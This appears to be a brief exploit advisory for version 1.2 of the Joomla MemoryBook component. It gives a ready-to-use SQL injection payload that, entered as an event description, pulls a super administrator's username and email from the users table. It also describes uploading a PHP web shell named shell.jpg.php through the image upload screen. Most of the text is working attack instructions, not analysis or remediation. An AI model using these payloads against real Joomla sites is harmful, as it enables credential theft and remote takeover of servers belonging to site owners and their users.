The Joomla MemoryBook component version 1.2 suffers from remote SQL injection, shell upload, and file inclusion vulnerabilities.
5546bd899ad71f4f71a2ea1e7c8a7dcbc97e01f3e9dd482b778e416a6bb33a97
SQL Injection
-------------
requires: magic quotes OFF, user account
Add this as the description of a new event:
'), ( 63,(SELECT CONCAT(username,0x20,email) FROM #__users WHERE gid=25
LIMIT 1),1,1,1) -- '
NOTE: 63 MUST be your Joomla user ID. extracted info can be found on
View Events page
Remote File Inclusion
---------------------
requires: user account
Just upload your PHP shell (shell.jpg.php) through the Add Image screen,
and find it's new URL in the View Images screen.